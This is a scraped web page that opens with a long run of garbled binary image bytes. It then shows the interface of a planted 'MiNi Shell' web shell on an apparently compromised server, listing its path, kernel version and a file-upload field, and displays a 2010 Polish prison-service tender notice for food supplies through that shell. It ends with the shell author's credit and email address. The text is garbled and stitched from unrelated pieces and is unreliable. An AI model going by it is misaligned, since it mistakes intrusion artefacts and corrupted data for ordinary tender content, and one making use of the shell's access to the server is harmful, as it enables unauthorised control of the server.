JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100217/45852-N-2010.html

<p class="kh_header"><b>Zakopane: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 45852 - 2010; data zamieszczenia: 17.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Zakopanem , ul. Ogrodowa 6, 34-500 Zakopane, woj. małopolskie, tel. 0-18 2013431, faks 0-18 2013431 wew. 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sw.gov.pl/index.php/jednostki/6/319</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia różne produkty spożywcze z grupy 158 w następujących ilościach: 

Grupa I Wyroby ciastkarskie, cukiernicze, kawa herbata i podobne produkty
Lp.	Nazwa towaru	J.m	Ilośc			
1	Baton Snickers waga  od 40g do 70g netto	Szt	1200
2	Baton Mars od waga 40g do 60g netto	Szt	1000
3	Prince polo waga od 30g do 50g netto	Szt	800
4	Herbatniki Pieguski waga od 100g do 200g netto 	kg	30
5	Ciasteczka Jeżyki waga od100g do 200g netto	kg	30
6	Czekolada mleczna waga 100g netto	kg	50
7	Wafle Grześki  waga od 30g do 50g netto	szt	600
8	Paluszki sezamowe waga od 100g do 300g netto	kg	20
9	Paluszki słone waga od 100g do 300g netto	kg	20
10	Delicje szampańskie  waga od 100g do 300g netto	kg	100
11	Herbata Lipton pakowana w kartoniki od 50szt do 100szt  w saszetkach z zawieszką waga 1sztuki 0,002g netto	kg	100
12	Herbata Eternal pakowana w kartoniki od 50szt do 100szt  w saszetkach z zawieszką waga 1 sztuki 0,002g netto	kg	150
13	Kawa Fort mielona waga od 200g do 600g netto	kg	100
14	Kawa Maxwell Hause rozpuszczalna waga od 100g do 300g netto	kg	100
15	Kawa Nescafe Clasic rozpuszczalna waga od 100g do 300g netto	kg	100
16	Kawa Tchibo mielona waga  od 100g do 300g netto	kg	50
17	Kawa Prima mielona wagaod 100g do  300g netto	kg	50

Grupa II Produkty z ciasta makaronowego
lp	Nazwa towaru	J.m	Ilość
1	Makaron łazanki typu lubella waga od 400g do 1000g netto	kg	100
2	Makaron tarte ciast typu lubella waga od 250g do 1000g netto	kg	100
3	Makaron świderki typu lubella waga od 400g do 1000g netto	kg	50
4	Makaron kolanka typu lubella waga od 400g do 1000g netto	kg	50
5	Makaron nitka typu lubella waga od 400g do 1000g. netto	kg	50
6	Makaron gwiazdki typu lubella waga  od 400g do 1000g netto	kg	50
7	Makaron muszelki duże typu  lubella waga od 400g do 1000g netto	kg	50
8	Makaron gruba rurka typu lubella waga od 400g do 1000g netto	kg	100
9	Makron wstążki typu lubella waga od 400g do 1000g netto	kg	50
10	Makaron Spaghetti typu lubella waga od 400g do 1000g netto	kg	50
11	Makaron Lasagne typu lubella waga od 400g do 1000g netto	kg	20
12	Groszek ptysiowy waga od 100g do 500g netto	kg	100

Grupa III Cukier produkty pokrewne , miód
L.p.	Nazwa towaru	J.m.	Ilość			
1	Cukier pakowany w torebkach papierowych 1 kg netto	kg	3500
2	Cukier puder  pakowany w torebkach papierowych 0,5 kg netto	kg	250
3	Cukier wanilinowy  waga od 20g do 50g netto	kg	50
4	Miód prawdziwy słoik waga  od 200g do 500g netto	kg	30
5	Miód porcjowany waga  od 15g do 30g netto	kg	150
6	Miód sztuczny waga od 200g do 500g netto	kg	30

Grupa IV Mieszanki przypraw
L.p.	Nazwa towaru	J.m.	Ilość			
1	Skórka pomarańczowa  w opakowaniu od 100g do 200g netto	kg	10
2	Budyń śmietankowy w opakowaniu od 30g do 50g netto	kg	30
3	Cynamon w opakowaniu od  10g do 30g netto	kg	5
4	Przyprawa do ryb typu  Knora w opakowaniu od 20g do 1000g netto	kg	5
5	Ketchup  łagodny w opakowaniach z dozownikiem w opakowaniu od 250g do 500g netto	kg	200
6	Kisiel w opakowaniu  od 40g do 100g netto	kg	30
7	Kminek w opakowaniu od 10g do 100g netto	kg	10
8	Kwasek cytrynowy w opakowaniu  od 10g do 100g netto	kg	20
9	Liśc laurowy w opakowaniu od 10g do 100g netto	kg	5
10	Majeranek w opakowaniu  od 15g do 100g netto	kg	10
11	Musztarda łagodna w opakowaniach z dozownikiem od 250g do 500g netto	kg	200
12	Ocet  spirytusowy  w butelkach od  0,5l do 1l netto	L	100
13	Ocet winny w butelkach  od 0,25l do 0,5l netto	L	20
14	Papryka słodka w opakowaniu  od 10g do 50g netto	kg	10
15	Papryka ostra w opakowaniu od 10g do 50g netto	kg	5
16	Majonez  typu kielecki przeznaczony do sałatek  w słoikach od 250g do 700g netto	kg	600
17	Pieprz w opakowaniu  od 10g do 50g netto	kg	20
18	Proszek do pieczenia w opakowaniu od 10g do 50g netto	kg	30
19	Przyprawa do kurczaka w opakowniu od 10g do 50g netto	kg	20
20	Przyprawa do zup typu maggi w opakowaniu szklanym 0,5l do 1 l netto	L	400
21	Rosół z kury typu Knorr kostki od 10g do 20g w opakowaniu od 6szt do 10szt netto 	kg	100
22	Przyprawa warzywna typu Vegeta w opakowaniu od 0,5kg do 1000g  netto	kg	100
23	Ziele angielskie w opakowaniu od  5 g do 30g netto	kg	10
24	Żelatyna spożywcza w opakowaniu od 10g do 100g netto	kg	20
25	Imbir w opakowaniu od 10g do 30g netto	kg	1
26	Zurek śląski  w opakowaniu od 40g do 50g netto 	kg	60
27	Oregano  w opakowaniu od 10gdo 30g netto	kg	2
28	Aromaty do ciast w opakowaniu 6g do 20g netto 	kg	1
29	Drożdze w kostkach  w opakowniu od 100g do 500g netto	kg	20
30	Przyprawa do piernika  w opakowaniu od 10g do 50g netto	kg	2
31	Gałka muszkatołowa w opakowaniu od 10g do 50g netto	kg	1
32	Przyprawa curry  w opakowaniu od 10g do 50g netto	kg	1
33	Gożdziki w opakowaniu od 10g do 50g netto	kg	1
34	Soda oczyszczona  w opakowaniu od 30g do 100g netto	kg	5
35	Przyprawa do grila  w opakowniu od 10g do 50g netto	kg	3
36	Kakao naturalne  w opakowaniu od  80g do 200g netto	kg	20
37	Sól w opakowaniu 1 kg netto	kg	400
38	Kurkuma  w opakowaniu od 10g do 50g netto	kg	1
39	Czosnek granulowany  w opakowaniu od 10g do 50g netto	kg	10

Określona ilość towaru jest wielkością szacunkową. Zamawiający nie gwarantuje zrealizowania całości zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przez upływem terminu do składnia ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/index.php/zamowienia/6/108<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można otrzymać bezpłatnie w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2010 godzina 10:00, miejsce: Ofertę należy złożyć  w Sekretariacie w siedzibie zamawiającego, pokój numer 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com